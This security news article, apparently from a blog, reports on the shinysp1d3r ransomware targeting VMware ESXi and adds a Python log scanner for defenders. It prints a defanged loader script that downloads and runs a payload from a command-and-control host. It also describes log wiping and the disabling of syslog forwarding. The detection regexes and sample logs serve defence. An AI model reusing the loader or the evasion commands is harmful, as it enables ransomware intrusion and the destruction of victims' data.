New ‘shinysp1d3r’ Ransomware-as-a-service in Active Development to Encrypt VMware ESXi Environments

Emerging in mid-2025, the shinysp1d3r ransomware-as-a-service (RaaS) platform represents the next evolution of cloud-focused extortion tools.

Unlike traditional ransomware that targets Windows endpoints or network file shares, shinysp1d3r is engineered specifically to infect and encrypt VMware ESXi hypervisors and their attached datastores.

Early deployments have demonstrated a two-stage payload delivery: initial access is gained through compromised SSO credentials or SSH keys, followed by a secondary module that spreads laterally across ESXi clusters.

Victims report that once deployed, the ransomware enumerates all running virtual machines, disables snapshot functionality, and begins simultaneous AES-256 encryption of each VMDK file.

Data extortion message (Source – EclecticIQ)

The project’s control panel offers affiliates granular options to tailor the encryption process by selecting datastores, specifying file extensions to target, and configuring network throttling to evade detection.

Affiliates can monitor real-time progress and negotiate ransom terms using an integrated chat widget.

While still under active development, shinysp1d3r has already drawn interest from multiple underground forums due to its streamlined management interface and robust error-handling routines, which ensure that partial encryptions can resume automatically after service interruptions.

EclecticIQ analysts observed that shinysp1d3r is poised to leverage existing ShinyHunters infrastructure and affiliate networks to rapidly expand its victim base once matured.

Functionally, shinysp1d3r’s architecture consists of a lightweight loader and a full-featured encryption daemon.

ShinyHunters team and connection with Scattered Spider (Source – EclecticIQ)

The loader is a position-independent shell script that infects ESXi hosts via SSH or API calls, stages the daemon in memory, and triggers execution, all without writing files to disk.

The daemon then mounts each datastore with exclusive locks, suspends any running VMs to capture consistent snapshots in memory, and executes an embedded Go-based encryption binary.

This binary employs concurrent worker threads to maximize throughput and avoid triggering hypervisor performance alerts.

Infection Mechanism

Affiliates typically initiate infections by harvesting SSH keys from misconfigured management servers or by abusing stolen SSO tokens obtained through vishing attacks.

Once authenticated, the loader script is deployed using the ESXi host’s built-in busybox shell. It checks for required privileges, then fetches the main ransomware payload from a C2 server over HTTPS.

AI Voice Agent workflow in Vishing campaigns (Source – EclecticIQ)

The following snippet illustrates the loader’s core logic (URLs and paths are shown defanged):

#!/bin/sh
# shinysp1d3r loader for ESXi
C2="https[:]//srv[.]affiliateshinysp1d3r[.]com/payload"
TMP="/tmp/[.]shinyloader"
wget -qO "$TMP" "$C2" && chmod +x "$TMP"
# Execute in memory
$TMP --esxi-user root --esxi-pass "${ESXI_PASS}"

After execution, the loader cleans up logs to remove audit traces and disables syslog forwarding to external servers. The daemon then iterates through each datastore path under /vmfs/volumes, locks files using ESXi’s VOMA API, and applies encryption in place.

By leveraging the hypervisor’s local file locking, shinysp1d3r ensures that no virtual disks can be modified or rolled back, forcing victims to either restore from offline backups or pay the ransom.
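The sequence described above (a payload fetched into /tmp and executed, syslog forwarding switched off, local logs wiped, then many VMs stopped in quick succession) leaves a recognisable trail in an ESXi host’s shell history if that history is shipped off the host before the loader disables forwarding. The following Python script is an added example for defenders, not code from the EclecticIQ report or from this article: it scans constructed log lines written in the shape of ESXi /var/log/shell.log and flags each of those behaviours. The line format, the regexes, the five-power-offs-per-minute threshold and the .invalid host name are assumptions for illustration and would need tuning to a real environment.

```python
"""Added detection example: flag ESXi shell-history lines that match the
ransomware loader behaviour described in the article. The log format,
thresholds and sample data below are constructed assumptions."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Constructed sample in the shape of ESXi /var/log/shell.log
# (timestamp, process, user, command). Not a real capture.
SAMPLE_SHELL_LOG = """\
2025-06-14T09:12:01Z shell[2001]: [root]: esxcli storage filesystem list
2025-06-14T09:12:40Z shell[2001]: [root]: wget -qO /tmp/.shinyloader https://srv.example.invalid/payload
2025-06-14T09:12:41Z shell[2001]: [root]: chmod +x /tmp/.shinyloader
2025-06-14T09:12:42Z shell[2001]: [root]: /tmp/.shinyloader --esxi-user root
2025-06-14T09:13:05Z shell[2001]: [root]: esxcli system syslog config set --loghost=
2025-06-14T09:13:06Z shell[2001]: [root]: esxcli system syslog reload
2025-06-14T09:13:20Z shell[2001]: [root]: > /var/log/auth.log
2025-06-14T09:14:00Z shell[2001]: [root]: vim-cmd vmsvc/power.off 12
2025-06-14T09:14:01Z shell[2001]: [root]: vim-cmd vmsvc/power.off 13
2025-06-14T09:14:02Z shell[2001]: [root]: vim-cmd vmsvc/power.off 14
2025-06-14T09:14:03Z shell[2001]: [root]: vim-cmd vmsvc/power.off 15
2025-06-14T09:14:04Z shell[2001]: [root]: vim-cmd vmsvc/power.off 16
2025-06-14T09:14:05Z shell[2001]: [root]: vim-cmd vmsvc/power.off 17
"""

# Assumed shell.log layout: "<ts> shell[<pid>]: [<user>]: <command>"
LINE_RE = re.compile(r"^(?P<ts>\S+) shell\[\d+\]: \[(?P<user>[^\]]+)\]: (?P<cmd>.*)$")
# Download tool writing into /tmp; capture the destination path.
FETCH_RE = re.compile(r"\b(?:wget|curl)\b.*?(/tmp/\S+)")
# Command line that executes something living in /tmp.
EXEC_TMP_RE = re.compile(r"^(?:sh\s+|\.\s+)?(/tmp/\S+)")
# Remote syslog target cleared (empty --loghost).
SYSLOG_OFF_RE = re.compile(r"esxcli\s+system\s+syslog\s+config\s+set\b.*--loghost(?:=|\s+)(?:\"\"|''|\s|$)")
# Truncation or deletion of files under /var/log.
LOG_WIPE_RE = re.compile(r"(?:^\s*>\s*/var/log/|/dev/null\s*>\s*/var/log/|\brm\s+(?:-\w+\s+)*/var/log/)")
POWEROFF_RE = re.compile(r"vim-cmd\s+vmsvc/power\.off\b")

POWEROFF_THRESHOLD = 5            # assumed: this many power-offs ...
POWEROFF_WINDOW = timedelta(seconds=60)  # ... inside this window is a burst


@dataclass
class Finding:
    kind: str
    timestamp: str
    detail: str


def parse_ts(ts: str) -> datetime:
    """Parse an ISO-8601 'Z' timestamp into an aware datetime."""
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def scan_shell_log(text: str) -> list[Finding]:
    """Return findings in log order; a power-off burst is reported once."""
    findings: list[Finding] = []
    fetched_paths: set[str] = set()
    recent_poweroffs: list[datetime] = []
    burst_reported = False

    for raw in text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        ts, cmd = m["ts"], m["cmd"].strip()

        fetch = FETCH_RE.search(cmd)
        if fetch:
            fetched_paths.add(fetch.group(1))
            findings.append(Finding("fetch_to_tmp", ts, cmd))

        exe = EXEC_TMP_RE.match(cmd)
        if exe:
            # Higher confidence when the executed file was fetched earlier in the log.
            kind = "exec_fetched_payload" if exe.group(1) in fetched_paths else "exec_from_tmp"
            findings.append(Finding(kind, ts, cmd))

        if SYSLOG_OFF_RE.search(cmd):
            findings.append(Finding("syslog_forwarding_disabled", ts, cmd))

        if LOG_WIPE_RE.search(cmd):
            findings.append(Finding("log_wipe", ts, cmd))

        if POWEROFF_RE.search(cmd):
            now = parse_ts(ts)
            recent_poweroffs = [t for t in recent_poweroffs + [now] if now - t <= POWEROFF_WINDOW]
            if len(recent_poweroffs) >= POWEROFF_THRESHOLD and not burst_reported:
                findings.append(Finding("mass_vm_poweroff", ts,
                                        f"{len(recent_poweroffs)} power.off calls within {POWEROFF_WINDOW.seconds}s"))
                burst_reported = True

    return findings


if __name__ == "__main__":
    for f in scan_shell_log(SAMPLE_SHELL_LOG):
        print(f"{f.timestamp} {f.kind:28} {f.detail}")
```

Run it against a shell.log exported from a host or, better, against the copy held by a remote syslog collector, since the loader’s first housekeeping step is to cut off that forwarding and wipe the local files. The ordering matters: "fetch_to_tmp" followed by "exec_fetched_payload" from the same path is a much stronger signal than either line on its own, which is why the scanner remembers fetched paths across lines rather than matching each line in isolation.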


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.